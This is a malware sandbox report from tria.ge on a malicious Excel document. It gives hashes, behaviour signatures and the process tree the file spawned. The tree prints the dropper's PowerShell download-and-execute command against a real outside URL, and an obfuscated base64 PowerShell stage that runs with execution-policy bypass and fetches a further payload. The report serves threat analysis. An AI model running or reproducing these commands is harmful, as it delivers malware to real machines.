Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
114s -
max time network
120s -
platform
windows7_x64 -
resource
win7 -
submitted
14/07/2020, 14:07
General
-
Target
Получаване на транзакции.xls
-
Size
2.5MB
-
MD5
3270afb6349ded4b3adeb82aab1a2fa6
-
SHA1
79e753a3c5e9c35241e8a06ffa56fff6189a29cf
-
SHA256
e4238162da0854cbc8f4ce093d09b7bdde1830be20d5d1dcd32a217c619b8caa
-
SHA512
a3243369e5d0a3ef6b587b44a83c6e82a81a4722ee841095dfef5bbdb0e7971b2e686bf20c49566a04382ccfacb16241bcbbe4f958da9b58650d030499466405
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://ahjuric.si/Code.txt
Signatures
-
Suspicious use of WriteProcessMemory 6 IoCs
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Blacklisted process makes network request 1 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Получаване на транзакции.xls"1⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://ahjuric.si/Code.txt')2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Blacklisted process makes network request
- Process spawned unexpected child process
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy bypass -w 1 /e JABiAGgAZwBmAGQAcwBkAGYAZwBoAGYANgA1AGgAZgBnAGQAIAA9ACAAKAAnAHsAMgB9AHsAMAB9AHsAMQB9AHsAMwB9ACcALQBmACcAZABTAHQAJwAsACcAcgBpAG4AJwAsABwgYABEAGAAbwBgAHcAbgBgAGwAYABvAGEAHSAsACcAZwAnACkAOwBbAHYAbwBpAGQAXQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAVwBpAHQAaABQAGEAcgB0AGkAYQBsAE4AYQBtAGUAKAAnAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjACcAKQA7ACQAZgBqAD0AWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEkAbgB0AGUAcgBhAGMAdABpAG8AbgBdADoAOgBDAGEAbABsAEIAeQBuAGEAbQBlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAHCBgAE4AYABlAGAAVABgAC4AYABXAGAAZQBgAEIAYABDAGAAbABgAGkAYABlAGAATgBgAFQAHSApACwAJABiAGgAZwBmAGQAcwBkAGYAZwBoAGYANgA1AGgAZgBnAGQALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBvAGYAZgBpAGMAZQAtAHMAZQByAHYAaQBjAGUALQB0AGUAYwBoAC4AaQBuAGYAbwAvAHIAbgBwAC4AdAB4AHQAJwApAC4AUgBlAHAAbABhAGMAZQAoACIAXgAiACwAIAAiADQANAAiACkALgBSAGUAcABsAGEAYwBlACgAIgAqACIALAAgACIANAA4ACIAKQAuAFIAZQBwAGwAYQBjAGUAKAAiACMAIgAsACAAIgA3ADgAIgApAHwASQBFAFgAOwBbAEIAeQB0AGUAWwBdAF0AJABmAD0AWwBNAGkAYwByAG8AcwBvAGYAdAAuAFYAaQBzAHUAYQBsAEIAYQBzAGkAYwAuAEkAbgB0AGUAcgBhAGMAdABpAG8AbgBdADoAOgBDAGEAbABsAEIAeQBuAGEAbQBlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAHCBgAE4AYABlAGAAVABgAC4AYABXAGAAZQBgAEIAYABDAGAAbABgAGkAYABlAGAATgBgAFQAHSApACwAJABiAGgAZwBmAGQAcwBkAGYAZwBoAGYANgA1AGgAZgBnAGQALABbAE0AaQBjAHIAbwBzAG8AZgB0AC4AVgBpAHMAdQBhAGwAQgBhAHMAaQBjAC4AQwBhAGwAbABUAHkAcABlAF0AOgA6AE0AZQB0AGgAbwBkACwAJwBoAHQAdAAnACsAWwBDAGgAYQByAF0AOAAwACsAJwAnACAAKwAgAFsAQwBoAGEAcgBdADUAOAAgACsAIAAnAC8ALwBvAGYAZgBpAGMAZQAtAHMAZQByAHYAaQBjAGUALQB0AGUAYwBoAC4AaQBuAGYAbwAvAHAAbABkAC4AdAB4AHQAJwApAC4AcgBlAHAAbABhAGMAZQAoACcAJAAkACcALAAnADAAeAAnACkAfABJAEUAWAA7AFsAQwAuAE0AXQA6ADoAUgAoACcATQBTAEIAdQBpAGwAZAAuAGUAeABlACcALAAkAGYAKQA=3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-
-